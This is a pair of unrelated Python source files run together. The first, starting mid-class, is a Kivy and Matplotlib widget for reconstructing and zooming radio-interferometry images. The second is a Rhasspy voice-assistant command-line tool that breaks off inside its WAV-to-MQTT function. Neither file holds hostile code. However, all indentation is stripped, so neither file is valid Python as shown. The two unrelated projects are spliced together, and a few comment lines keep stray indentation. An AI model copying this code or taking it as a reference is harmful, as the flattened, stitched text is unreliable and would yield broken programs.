self.buf = [0,0,0,255]*(self.nx*self.ny)
self.arr = array('B',self.buf)
self.update_mpl()
self.texture.blit_buffer(self.arr, colorfmt='rgba', bufferfmt='ubyte')
BindTexture(texture=self.texture, index=0)
self.texture.wrap = 'clamp_to_edge'
# create a rectangle on which to plot texture (will be at index 0)
Color(1,1,1)
self.rect = Rectangle(size=(self.nx,self.ny),texture=self.texture)
self.rect.tex_coords = self.tex_coords
self.plot_frozen = False
# call the constructor of parent
# if they are any graphics objects, they will be added on our new
# canvas
super(InteractivePlotWidget, self).__init__(**kwargs)
# We'll update our glsl variables in a clock
# Clock.schedule_interval(self.update_glsl, 0)
Clock.schedule_interval(self.texture_init, 0)
# Generate some default resizing behaviors
self.bind(height=self.resize)
self.bind(width=self.resize)
def update_glsl(self, *largs):
# This is needed for the default vertex shader.
self.canvas['projection_mat'] = Window.render_context['projection_mat']
self.canvas['modelview_mat'] = Window.render_context['modelview_mat']
def texture_init(self, *args):
self.texture = self.canvas.children[-1].texture
self.update_glsl()
def on_touch_move(self,touch) :
if (not self.plot_frozen) :
x_shift = - touch.dpos[0]/float(self.rect.size[0])
y_shift = touch.dpos[1]/float(self.rect.size[1])
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
def on_touch_down(self,touch) :
if (touch.is_double_tap) :
self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
self.rect.tex_coords = self.tex_coords
maxwidth = max(self.width,self.height*self.nx/self.ny)
self.rect.size = self.check_size((maxwidth,self.ny*maxwidth/self.nx))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
x_shift = 0.0
y_shift = -0.5*(self.height-self.rect.size[1])/self.rect.size[1]
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
def zoom_in(self) :
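        # Each zoom step rescales the drawn rectangle by ~sqrt(2) (x1.414 here,
        # x0.707 in zoom_out), re-anchors it, and then shifts and clamps the
        # texture coordinates through check_boundaries() so the view stays valid.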
if (__cheap_image_debug__) :
print("InteractivePlotWidget.zoom_in:",self.rect.tex_coords,self.height)
old_size = self.rect.size
self.rect.size = self.check_size((self.rect.size[0]*1.414,self.rect.size[1]*1.414))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
y_shift = 0.5 * (self.rect.size[0]/old_size[0]-1.0) * self.height/self.rect.size[1]
x_shift = 0
if (__cheap_image_debug__) :
print("InteractivePlotWidget.zoom_in:",old_size,self.rect.size,y_shift)
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
if (__cheap_image_debug__) :
print(" :",self.rect.tex_coords,self.height)
def zoom_out(self) :
old_size = self.rect.size
self.rect.size = self.check_size((self.rect.size[0]*0.707,self.rect.size[1]*0.707))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
y_shift = 0.5 * (self.rect.size[0]/old_size[0]-1.0) * self.height/self.rect.size[1]
x_shift = 0
if (__cheap_image_debug__) :
print("InteractivePlotWidget.zoom_out:",old_size,self.rect.size,y_shift)
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
def resize(self,widget,newsize) :
if (__cheap_image_debug__) :
print("InteractivePlotWidget.resize:",newsize)
self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
self.rect.tex_coords = self.tex_coords
maxwidth = max(self.width,self.height*self.nx/self.ny)
self.rect.size = self.check_size((maxwidth,self.ny*maxwidth/self.nx))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
x_shift = 0.0
y_shift = -0.5*(self.height-self.rect.size[1])/self.rect.size[1]
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
def set_zoom_factor(self,value) :
        self.rect.size = self.check_size((self.nx*value, self.ny*value))
x_shift = -0.5*(self.width-self.rect.size[0])/float(self.rect.size[0])
y_shift = 0.5*(self.height-self.rect.size[1])/float(self.rect.size[1])
self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
self.rect.pos = (max(0,0.5*(self.width-self.rect.size[0])),(self.height-self.rect.size[1]))
def check_boundaries(self,tex_coords) :
new_tex_coords = [0]*len(tex_coords)
max_x_shift = max((self.rect.size[0]-self.width)/self.rect.size[0],0)
new_tex_coords[0] = max(min(tex_coords[0],max_x_shift),0)
new_tex_coords[2] = max(min(tex_coords[2],1+max_x_shift),1)
new_tex_coords[4] = max(min(tex_coords[4],1+max_x_shift),1)
new_tex_coords[6] = max(min(tex_coords[6],max_x_shift),0)
max_y_shift = max((self.rect.size[1]-self.height)/self.rect.size[1],0)
new_tex_coords[1] = max(min(tex_coords[1],1+max_y_shift),1)
new_tex_coords[3] = max(min(tex_coords[3],1+max_y_shift),1)
new_tex_coords[5] = max(min(tex_coords[5],max_y_shift),0)
new_tex_coords[7] = max(min(tex_coords[7],max_y_shift),0)
return new_tex_coords
def check_size(self,size) :
return size
def update_mpl(self,**kwargs) :
# print("Started update_mpl in thread")
fig = Figure(figsize=(self.nx/64,self.ny/64),dpi=64)
canvas = FigureCanvas(fig)
ax = fig.add_subplot(111,position=[0,0,1,1])
self.generate_mpl_plot(fig,ax,**kwargs)
# print("Made mpl plot in update_mpl in thread")
canvas.draw()
# print("Drew canvas in update_mpl in thread")
self.buf = np.asarray(canvas.buffer_rgba()).ravel()
# print("Assigned buf in update_mpl in thread")
self.arr = array('B', self.buf)
# print("Assigned arr in update_mpl in thread")
self.texture.blit_buffer(self.arr, colorfmt='rgba', bufferfmt='ubyte')
# print("Finished update_mpl in thread")
def generate_mpl_plot(self,fig,ax,**kwargs) :
# This is where we insert a Matplotlib figure. Must use ax. and fig. child commands.
pass
class InteractiveImageReconstructionPlot(InteractivePlotWidget) :
def __init__(self,**kwargs) :
self.xarr = 0
self.yarr = 0
self.Iarr = 1
self.ddict = {}
self.sdict = {}
# self.argument_hash = None
super().__init__(**kwargs)
##########
# Low-level image reconstruction function
def reconstruct_image(self,datadict,statdict,time_range=None,snr_cut=None,ngeht_diameter=6,f=2,method='cubic',make_hermitian=False) :
# print("Started image reconstruction in thread")
# Useful constant
uas2rad = np.pi/180.0/3600e6
# Exclude stations not in array
stations = list(np.unique(np.array(list(statdict.keys()))))
keep = np.array([ (datadict['s1'][j] in stations) and (datadict['s2'][j] in stations) for j in range(len(datadict['s1'])) ])
ddtmp = {}
for key in ['u','v','V','s1','s2','t','err'] :
ddtmp[key] = datadict[key][keep]
if (len(ddtmp['u'])==0) :
return None,None,None
# Exclude stations that are "off"
keep = np.array([ statdict[ddtmp['s1'][j]]['on'] and statdict[ddtmp['s2'][j]]['on'] for j in range(len(ddtmp['s1'])) ])
ddnew = {}
for key in ['u','v','V','s1','s2','t','err'] :
ddnew[key] = ddtmp[key][keep]
if (len(ddnew['u'])==0) :
return None,None,None
# Exclude data points outside the specified time range
if (not time_range is None) :
keep = (ddnew['t']>=time_range[0])*(ddnew['t']<time_range[1])
for key in ['u','v','V','s1','s2','t','err'] :
ddnew[key] = ddnew[key][keep]
if (len(ddnew['u'])==0) :
return None,None,None
# Cut points with S/N less than the specified minimum value
if (not snr_cut is None) and snr_cut>0:
# Get a list of error adjustments based on stations
diameter_correction_factor = {}
for s in stations :
if (statdict[s]['exists']) :
diameter_correction_factor[s] = 1.0
else :
diameter_correction_factor[s] = statdict[s]['diameter']/ngeht_diameter
keep = np.array([ np.abs(ddnew['V'][j])/(ddnew['err'][j].real * diameter_correction_factor[ddnew['s1'][j]] * diameter_correction_factor[ddnew['s2'][j]]) > snr_cut for j in range(len(ddnew['s1'])) ])
for key in ['u','v','V','s1','s2','t','err'] :
ddnew[key] = ddnew[key][keep]
if (len(ddnew['u'])==0) :
return None,None,None
# Double up data to make V hermitian
if (make_hermitian) :
ddnew['u'] = np.append(ddnew['u'],-ddnew['u'])
ddnew['v'] = np.append(ddnew['v'],-ddnew['v'])
ddnew['V'] = np.append(ddnew['V'],np.conj(ddnew['V']))
if (len(ddnew['u'])<=2) :
return None,None,None
# Get the region on which to compute gridded visibilities
umax = np.max(ddnew['u'])
vmax = np.max(ddnew['v'])
u2,v2 = np.meshgrid(np.linspace(-f*umax,f*umax,256),np.linspace(-f*vmax,f*vmax,256))
# SciPy
# pts = np.array([ddnew['u'],ddnew['v']]).T
# V2r = si.griddata(pts,np.real(ddnew['V']),(u2,v2),method=method,fill_value=0.0)
# V2i = si.griddata(pts,np.imag(ddnew['V']),(u2,v2),method=method,fill_value=0.0)
# Matplotlib
triang = tri.Triangulation(ddnew['u'], ddnew['v'])
if (method=='linear') :
V2r = np.array(np.ma.fix_invalid(tri.LinearTriInterpolator(triang, np.real(ddnew['V']))(u2,v2),fill_value=0.0))
V2i = np.array(np.ma.fix_invalid(tri.LinearTriInterpolator(triang, np.imag(ddnew['V']))(u2,v2),fill_value=0.0))
elif (method=='cubic') :
V2r = np.array(np.ma.fix_invalid(tri.CubicTriInterpolator(triang, np.real(ddnew['V']),kind='geom')(u2,v2),fill_value=0.0))
V2i = np.array(np.ma.fix_invalid(tri.CubicTriInterpolator(triang, np.imag(ddnew['V']),kind='geom')(u2,v2),fill_value=0.0))
else :
print("ERROR: method %s not implemented"%(method))
V2 = V2r + 1.0j*V2i
# Filter to smooth at edges
V2 = V2 * np.cos(u2/umax*0.5*np.pi) * np.cos(v2/vmax*0.5*np.pi)
# hu = 0.42 - 0.5*np.cos(2.0*np.pi*(u2+umax)/(2*umax)) + 0.08*np.cos(4.0*np.pi*(u2+umax)/(2*umax))
# hv = 0.42 - 0.5*np.cos(2.0*np.pi*(v2+umax)/(2*umax)) + 0.08*np.cos(4.0*np.pi*(v2+umax)/(2*umax))
# V2 = V2*hu*hv
# Generate the x,y grid on which to image
x1d = np.fft.fftshift(np.fft.fftfreq(u2.shape[0],d=(u2[1,1]-u2[0,0])*1e9)/uas2rad)
y1d = np.fft.fftshift(np.fft.fftfreq(v2.shape[1],d=(v2[1,1]-v2[0,0])*1e9)/uas2rad)
xarr,yarr = np.meshgrid(-x1d,-y1d)
# Compute image estimate via FFT
Iarr = np.fft.fftshift(np.real(np.fft.ifft2(np.fft.ifftshift(V2))))
# Iarr = np.fft.fftshift(np.abs(np.fft.ifft2(np.fft.ifftshift(V2))))
# print("Finished image reconstruction in thread")
# Return
return xarr,yarr,Iarr
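# Illustrative sketch of the inputs reconstruct_image expects (the station names and
# values below are assumptions for the example, not real data): datadict holds parallel
# numpy arrays keyed by 'u', 'v' (baseline coordinates), 'V' (complex visibilities),
# 's1', 's2' (station codes), 't' (observation times) and 'err' (uncertainties);
# statdict maps each station code to a dict with at least 'on', 'exists' and 'diameter'.
#   datadict = {'u':np.array([1.0]), 'v':np.array([0.5]), 'V':np.array([1+0j]),
#               's1':np.array(['AA']), 's2':np.array(['BB']), 't':np.array([0.0]),
#               'err':np.array([0.1+0.1j])}
#   statdict = {'AA':{'on':True,'exists':True,'diameter':6},
#               'BB':{'on':True,'exists':True,'diameter':6}}
#   xarr, yarr, Iarr = self.reconstruct_image(datadict, statdict, snr_cut=5)
# Insufficient or fully filtered data makes the method return (None, None, None).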
def generate_mpl_plot(self,fig,ax,**kwargs) :
if (__cheap_image_debug__) :
print("InteractiveImageReconstructionPlot.generate_mpl_plot: start")
# This is where we insert a Matplotlib figure. Must use ax. and fig. child commands.
# The following settings are recommended, but not required, for the overlay
self.plot_image_reconstruction(ax,self.ddict,self.sdict,**kwargs)
ax.set_facecolor((0,0,0,1))
fig.set_facecolor((0,0,0,1))
def update(self,datadict,statdict,**kwargs) :
self.sdict = statdict
self.ddict = datadict
# print("Started update, initiating thread:",kwargs)
self.update_mpl(**kwargs)
# # create the thread to invoke other_func with arguments (2, 5)
# andrews_specific_name = threading.Thread(target=self.update_mpl, kwargs=kwargs)
# # # set daemon to true so the thread dies when app is closed
# andrews_specific_name.daemon = True
# # start the thread
# andrews_specific_name.start()
# # wait for end for now
# andrews_specific_name.join()
# #time.sleep(10) # HACK
# print("Finished update, should have finished thread")
def replot(self,datadict,statdict,**kwargs) :
self.sdict = statdict
self.ddict = datadict
self.update_mpl(**kwargs)
# print("Started replot, initiating thread")
# # create the thread to invoke other_func with arguments (2, 5)
# t = threading.Thread(target=self.update_mpl, kwargs=kwargs)
# # # set daemon to true so the thread dies when app is closed
# # t.daemon = True
# # start the thread
# t.start()
# # wait for end for now
# t.join()
# print("Finished replot, should have finished thread")
def check_boundaries(self,tex_coords) :
return tex_coords
def check_size(self,size) :
if (size[0]<self.width) :
size = (self.width, size[1]/size[0] * self.width)
elif (size[1]<self.height) :
size = (size[0]/size[1] * self.height, self.height)
return size
############
# High-level plot generation
def plot_image_reconstruction(self,axs,datadict,statdict,time_range=None,snr_cut=None,ngeht_diameter=6,limits=None,show_map=True,show_contours=True) :
if (len(statdict.keys())==0) :
return
# Reconstruct image
self.xarr,self.yarr,self.Iarr=self.reconstruct_image(datadict,statdict,time_range=time_range,snr_cut=snr_cut,ngeht_diameter=ngeht_diameter)
self.replot_image_reconstruction(axs,time_range=time_range,limits=limits,show_map=show_map,show_contours=show_contours)
############
# High-level plot generation
def replot_image_reconstruction(self,axs,time_range=None,limits=None,show_map=True,show_contours=True) :
if (self.Iarr is None) :
axs.text(0.5,0.5,"Insufficient Data!",color='w',fontsize=24,ha='center',va='center')
return
# Plot linear image
if (show_map) :
axs.imshow(self.Iarr,origin='lower',extent=[self.xarr[0,0],self.xarr[0,-1],self.yarr[0,0],self.yarr[-1,0]],cmap='afmhot',vmin=0,interpolation='spline16')
# Plot the log contours
if (show_contours) :
lI = np.log10(np.maximum(0.0,self.Iarr)/np.max(self.Iarr)+1e-20)
lmI = np.log10(np.maximum(0.0,-self.Iarr)/np.max(self.Iarr)+1e-20)
lev10lo = max(np.min(lI[self.Iarr>0]),-4)
lev10 = np.sort( -np.arange(0,lev10lo,-1) )
axs.contour(self.xarr,self.yarr,-lI,levels=lev10,colors='cornflowerblue',alpha=0.5)
#plt.contour(self.x,self.y,-lmI,levels=lev10,colors='green',alpha=0.5)
lev1 = []
for l10 in -lev10[1:] :
lev1.extend( np.log10(np.array([2,3,4,5,6,7,8,9])) + l10 )
lev1 = np.sort(-np.array(lev1))
axs.contour(self.xarr,self.yarr,-lI,levels=lev1,colors='cornflowerblue',alpha=0.5,linewidths=0.5)
axs.contour(self.xarr,self.yarr,-lmI,levels=lev1[-10:],colors='green',alpha=0.5,linewidths=0.5)
# Fix the limits
if (not limits is None) :
axs.set_xlim((limits[0],limits[1]))
axs.set_ylim((limits[2],limits[3]))
else :
xmin = min(np.min(self.xarr[lI>-2]),np.min(self.yarr[lI>-2]))
xmax = max(np.max(self.xarr[lI>-2]),np.max(self.yarr[lI>-2]))
axs.set_xlim((xmax,xmin))
axs.set_ylim((xmin,xmax))
|
__init__.py
|
"""Rhasspy command-line interface"""
import argparse
import asyncio
import io
import json
import logging
# Configure logging
import logging.config
import os
import sys
import threading
import time
import wave
from typing import Any
from rhasspy.audio_recorder import AudioData
from rhasspy.core import RhasspyCore
from rhasspy.profiles import Profile
from rhasspy.utils import buffer_to_wav
from rhasspy.wake import WakeWordDetected
logger = logging.getLogger("rhasspy")
# -----------------------------------------------------------------------------
# Globals
# -----------------------------------------------------------------------------
mic_stdin_thread = None
mic_stdin_running = False
# -----------------------------------------------------------------------------
async def main() -> None:
"""Main method"""
global mic_stdin_running, mic_stdin_thread
# Parse command-line arguments
parser = argparse.ArgumentParser(description="Rhasspy")
parser.add_argument(
"--profile", "-p", required=True, type=str, help="Name of profile to use"
)
parser.add_argument(
"--system-profiles",
type=str,
help="Directory with base profile files (read only)",
default=os.path.join(os.getcwd(), "profiles"),
)
parser.add_argument(
"--user-profiles",
type=str,
help="Directory with user profile files (read/write)",
default=os.path.expanduser("~/.config/rhasspy/profiles"),
)
parser.add_argument(
"--set",
"-s",
nargs=2,
action="append",
help="Set a profile setting value",
default=[],
)
parser.add_argument(
"--debug", action="store_true", help="Print DEBUG log to console"
)
parser.add_argument(
"--no-check",
action="store_true",
help="Don't check profile for necessary files",
)
sub_parsers = parser.add_subparsers(dest="command")
sub_parsers.required = True
# info
info_parser = sub_parsers.add_parser("info", help="Profile information")
info_parser.add_argument(
"--defaults", action="store_true", help="Only print default settings"
)
# wav2text
wav2text_parser = sub_parsers.add_parser(
"wav2text", help="WAV file to text transcription"
)
wav2text_parser.add_argument("wav_files", nargs="*", help="Paths to WAV files")
# text2intent
text2intent_parser = sub_parsers.add_parser(
"text2intent", help="Text parsed to intent"
)
text2intent_parser.add_argument("sentences", nargs="*", help="Sentences to parse")
text2intent_parser.add_argument(
"--handle", action="store_true", help="Pass result to intent handler"
)
# wav2intent
wav2intent_parser = sub_parsers.add_parser(
"wav2intent", help="WAV file to parsed intent"
)
wav2intent_parser.add_argument("wav_files", nargs="*", help="Paths to WAV files")
wav2intent_parser.add_argument(
"--handle", action="store_true", help="Pass result to intent handler"
)
# train
train_parser = sub_parsers.add_parser("train", help="Re-train profile")
train_parser.add_argument(
"--no-cache", action="store_true", help="Clear training cache"
)
# mic2wav
mic2wav_parser = sub_parsers.add_parser("mic2wav", help="Voice command to WAV data")
mic2wav_parser.add_argument(
"--timeout",
type=float,
default=None,
help="Maximum number of seconds to record (default=profile)",
)
# mic2text
mic2text_parser = sub_parsers.add_parser(
"mic2text", help="Voice command to text transcription"
)
mic2text_parser.add_argument(
"--timeout",
type=float,
default=None,
help="Maximum number of seconds to record (default=profile)",
)
# mic2intent
mic2intent_parser = sub_parsers.add_parser(
"mic2intent", help="Voice command to parsed intent"
)
mic2intent_parser.add_argument(
"--stdin", action="store_true", help="Read audio data from stdin"
)
mic2intent_parser.add_argument(
"--handle", action="store_true", help="Pass result to intent handler"
)
mic2intent_parser.add_argument(
"--timeout",
type=float,
default=None,
help="Maximum number of seconds to record (default=profile)",
)
# word2phonemes
word2phonemes_parser = sub_parsers.add_parser(
"word2phonemes", help="Get pronunciation(s) for word(s)"
)
word2phonemes_parser.add_argument("words", nargs="*", help="Word(s) to pronounce")
word2phonemes_parser.add_argument(
"-n", type=int, default=1, help="Maximum number of pronunciations"
)
# word2wav
word2wav_parser = sub_parsers.add_parser("word2wav", help="Pronounce word")
word2wav_parser.add_argument("word", help="Word to pronounce")
# wav2mqtt
wav2mqtt_parser = sub_parsers.add_parser(
"wav2mqtt", help="Push WAV file(s) to MQTT"
)
wav2mqtt_parser.add_argument("wav_files", nargs="*", help="Paths to WAV files")
wav2mqtt_parser.add_argument(
"--frames",
type=int,
default=480,
help="WAV frames per MQTT message (default=0 for all)",
)
wav2mqtt_parser.add_argument(
"--site-id", type=str, default="default", help="Hermes siteId (default=default)"
)
wav2mqtt_parser.add_argument(
"--silence-before",
type=float,
default=0,
help="Seconds of silence to add before each WAV",
)
wav2mqtt_parser.add_argument(
"--silence-after",
type=float,
default=0,
help="Seconds of silence to add after each WAV",
)
wav2mqtt_parser.add_argument(
"--pause",
type=float,
default=0.01,
help="Seconds to wait before sending next chunk (default=0.01)",
)
# text2wav
text2wav_parser = sub_parsers.add_parser(
"text2wav", help="Output WAV file using text to speech system"
)
text2wav_parser.add_argument("sentence", help="Sentence to speak")
# text2speech
text2speech_parser = sub_parsers.add_parser(
"text2speech", help="Speak sentences using text to speech system"
)
text2speech_parser.add_argument("sentences", nargs="*", help="Sentences to speak")
# sleep
sub_parsers.add_parser("sleep", help="Wait for wake word")
# download
download_parser = sub_parsers.add_parser("download", help="Download profile files")
download_parser.add_argument(
"--delete", action="store_true", help="Clear download cache before downloading"
)
# check
sub_parsers.add_parser("check", help="Check downloaded profile files")
# sentences
sub_parsers.add_parser("sentences", help="Print the profile's sentences.ini")
# -------------------------------------------------------------------------
args = parser.parse_args()
if args.debug:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
profiles_dirs = [args.system_profiles, args.user_profiles]
logger.debug(profiles_dirs)
# Create rhasspy core
core = RhasspyCore(args.profile, args.system_profiles, args.user_profiles)
# Add profile settings from the command line
extra_settings = {}
for key, value in args.set:
try:
value = json.loads(value)
except Exception:
pass
logger.debug("Profile: %s=%s", key, value)
extra_settings[key] = value
core.profile.set(key, value)
# Handle command
if args.command == "info":
if args.defaults:
# Print default settings
json.dump(core.defaults, sys.stdout, indent=4)
else:
# Print profile settings
json.dump(core.profile.json, sys.stdout, indent=4)
elif args.command == "sentences":
sentences_path = core.profile.read_path(
core.profile.get("speech_to_text.sentences_ini", "sentences.ini")
)
with open(sentences_path, "r") as sentences_file:
sys.stdout.write(sentences_file.read())
else:
# Patch profile
profile = core.profile
profile.set("rhasspy.listen_on_start", False)
profile.set("rhasspy.preload_profile", False)
if args.command == "wav2mqtt":
profile.set("mqtt.enabled", True)
elif args.command in ["mic2intent"] and args.stdin:
profile.set("microphone.system", "stdin")
profile.set("microphone.stdin.auto_start", False)
mic_stdin_running = True
elif args.command == "text2wav":
profile.set("sounds.system", "dummy")
# Set environment variables
os.environ["RHASSPY_BASE_DIR"] = os.getcwd()
os.environ["RHASSPY_PROFILE"] = core.profile.name
os.environ["RHASSPY_PROFILE_DIR"] = core.profile.write_dir()
# Execute command
command_funcs = {
"wav2text": wav2text,
"text2intent": text2intent,
"wav2intent": wav2intent,
"train": train_profile,
"mic2text": mic2text,
"mic2intent": mic2intent,
"mic2wav": mic2wav,
"word2phonemes": word2phonemes,
"word2wav": word2wav,
"wav2mqtt": wav2mqtt,
"text2wav": text2wav,
"text2speech": text2speech,
"sleep": sleep,
"download": download,
"check": check,
}
# Automatically start core
await core.start()
if not args.no_check and (args.command not in ["check", "download"]):
# Verify that profile has necessary files
missing_files = core.check_profile()
if missing_files:
logger.fatal(
"Missing required files for %s: %s. Please run download command and try again.",
profile.name,
list(missing_files),
)
sys.exit(1)
if mic_stdin_running:
logger.debug("Reading audio data from stdin")
mic_stdin_thread = threading.Thread(
target=read_audio_stdin, args=(core,), daemon=True
)
mic_stdin_thread.start()
# Run command
try:
await command_funcs[args.command](core, profile, args)
if mic_stdin_thread is not None:
mic_stdin_running = False
mic_stdin_thread.join()
finally:
await core.shutdown()
# -----------------------------------------------------------------------------
# wav2text: transcribe WAV file(s) to text
# -----------------------------------------------------------------------------
async def wav2text(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Transcribe WAV file(s)"""
if args.wav_files:
# Read WAV paths from argument list
transcriptions = {}
for wav_path in args.wav_files:
with open(wav_path, "rb") as wav_file:
text = (await core.transcribe_wav(wav_file.read())).text
transcriptions[wav_path] = text
# Output JSON
json.dump(transcriptions, sys.stdout, indent=4)
else:
# Read WAV data from stdin
text = (await core.transcribe_wav(sys.stdin.buffer.read())).text
# Output text
print(text)
# -----------------------------------------------------------------------------
# text2intent: parse text into intent(s)
# -----------------------------------------------------------------------------
async def text2intent(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Parse sentences from command line or stdin"""
intents = {}
sentences = args.sentences or sys.stdin
for sentence in sentences:
sentence = sentence.strip()
intent = (await core.recognize_intent(sentence)).intent
if args.handle:
intent = (await core.handle_intent(intent)).intent
intents[sentence] = intent
# Output JSON
json.dump(intents, sys.stdout, indent=4)
# -----------------------------------------------------------------------------
# wav2intent: transcribe WAV file(s) to text and parse into intent(s)
# -----------------------------------------------------------------------------
async def wav2intent(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Recognize intent from WAV file(s)"""
if args.wav_files:
# Read WAV paths from argument list
transcriptions = {}
for wav_path in args.wav_files:
with open(wav_path, "rb") as wav_file:
text = (await core.transcribe_wav(wav_file.read())).text
transcriptions[wav_path] = text
# Parse intents
intents = {}
for wav_path, sentence in transcriptions.items():
intent = (await core.recognize_intent(sentence)).intent
if args.handle:
intent = (await core.handle_intent(intent)).intent
intents[wav_path] = intent
# Output JSON
json.dump(intents, sys.stdout, indent=4)
else:
# Read WAV data from stdin
sentence = (await core.transcribe_wav(sys.stdin.buffer.read())).text
intent = (await core.recognize_intent(sentence)).intent
if args.handle:
intent = (await core.handle_intent(intent)).intent
# Output JSON
json.dump(intent, sys.stdout, indent=4)
# -----------------------------------------------------------------------------
# train: re-train profile speech/intent recognizers
# -----------------------------------------------------------------------------
async def train_profile(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Train Rhasspy profile"""
result = await core.train(reload_actors=False, no_cache=args.no_cache)
print(result)
# -----------------------------------------------------------------------------
# mic2wav: record voice command and output WAV data
# -----------------------------------------------------------------------------
async def mic2wav(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Record voice command from microphone"""
# Listen until silence
wav_data = buffer_to_wav((await core.record_command(args.timeout)).data)
# Output WAV data
sys.stdout.buffer.write(wav_data)
# -----------------------------------------------------------------------------
# mic2text: record voice command, then transcribe
# -----------------------------------------------------------------------------
async def mic2text(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Record voice command and transcribe"""
# Listen until silence
wav_data = buffer_to_wav((await core.record_command(args.timeout)).data)
# Transcribe
text = (await core.transcribe_wav(wav_data)).text
# Output text
print(text)
# -----------------------------------------------------------------------------
# mic2intent: record voice command, then transcribe/parse
# -----------------------------------------------------------------------------
def read_audio_stdin(core: RhasspyCore, chunk_size: int = 960):
"""Record audio chunks from stdin"""
global mic_stdin_running
while mic_stdin_running:
audio_data = sys.stdin.buffer.read(chunk_size)
core.send_audio_data(AudioData(audio_data))
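# Sizing note (illustrative; the audio format is an assumption, not read from the profile):
# with 16-bit mono PCM, the default chunk_size of 960 bytes is 480 samples, i.e. about
# 30 ms of audio at 16 kHz -- the same default frame count used by the wav2mqtt command.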
async def mic2intent(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Record voice command, transcribe, and recognize intent"""
# Listen until silence
wav_data = buffer_to_wav((await core.record_command(args.timeout)).data)
# Transcribe
sentence = (await core.transcribe_wav(wav_data)).text
# Parse
intent = (await core.recognize_intent(sentence)).intent
if args.handle:
intent = (await core.handle_intent(intent)).intent
# Output JSON
json.dump(intent, sys.stdout, indent=4)
# -----------------------------------------------------------------------------
# word2phonemes: get pronunciation(s) for a word
# -----------------------------------------------------------------------------
async def word2phonemes(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Get pronunciation(s) for word(s)"""
words = args.words
if not words:
words = [w.strip() for w in sys.stdin if w.strip()]
# Get pronunciations for all words
pronunciations = (
await core.get_word_pronunciations(words, n=args.n)
).pronunciations
# Output JSON
json.dump(pronunciations, sys.stdout, indent=4)
# -----------------------------------------------------------------------------
# word2wav: pronounce word as WAV data
# -----------------------------------------------------------------------------
async def word2wav(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Speak a word's pronunciation"""
# Get pronunciation for word
all_pronunciations = (
await core.get_word_pronunciations([args.word], n=1)
).pronunciations
word_pronunciations = all_pronunciations[args.word]["pronunciations"]
# Convert from CMU phonemes to eSpeak phonemes
espeak_str = (await core.get_word_phonemes(word_pronunciations[0])).phonemes
# Pronounce as WAV
wav_data = (await core.speak_word(espeak_str)).wav_data
# Output WAV data
sys.stdout.buffer.write(wav_data)
# -----------------------------------------------------------------------------
# wav2mqtt: output WAV data to MQTT via Hermes protocol
# -----------------------------------------------------------------------------
def _send_frame(
core: RhasspyCore,
topic: str,
audio_data: bytes,
rate: int,
width: int,
channels: int,
) -> None:
"""Send a single audio frame via MQTT"""
with io.BytesIO() as mqtt_buffer:
mqtt_file: wave.Wave_write = wave.open(mqtt_buffer, mode="wb")
with mqtt_file:
mqtt_file.setframerate(rate)
mqtt_file.setsampwidth(width)
mqtt_file.setnchannels(channels)
mqtt_file.writeframes(audio_data)
# Send audio frame WAV
mqtt_payload = mqtt_buffer.getvalue()
core.mqtt_publish(topic, mqtt_payload)
async def wav2mqtt(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Publish WAV to MQTT as audio frames"""
# hermes/audioServer/<SITE_ID>/audioFrame
topic = f"hermes/audioServer/{args.site_id}/audioFrame"
if args.wav_files:
# Read WAV paths from argument list
for wav_path in args.wav_files:
with wave.open(wav_path, "rb") as wav_file:
rate = wav_file.getframerate()
width = wav_file.getsampwidth()
channels = wav_file.getnchannels()
if args.frames > 0:
# Split into chunks
chunk_size = args.frames * width * channels
if args.silence_before > 0:
# Silence
num_chunks = int(
(args.silence_before * rate * width * channels) / chunk_size
)
for _ in range(num_chunks):
_send_frame(
core, topic, bytes(chunk_size), rate, width, channels
)
time.sleep(args.pause)
# Read actual audio data
audio_data = wav_file.readframes(args.frames)
while audio_data:
_send_frame(core, topic, audio_data, rate, width, channels)
time.sleep(args.pause)
# Read next chunk
audio_data = wav_file.readframes(args.frames)
if args.silence_after > 0:
# Silence
num_chunks = int(
(args.silence_after * rate * width * channels) / chunk_size
)
for _ in range(num_chunks):
_send_frame(
core, topic, bytes(chunk_size), rate, width, channels
)
time.sleep(args.pause)
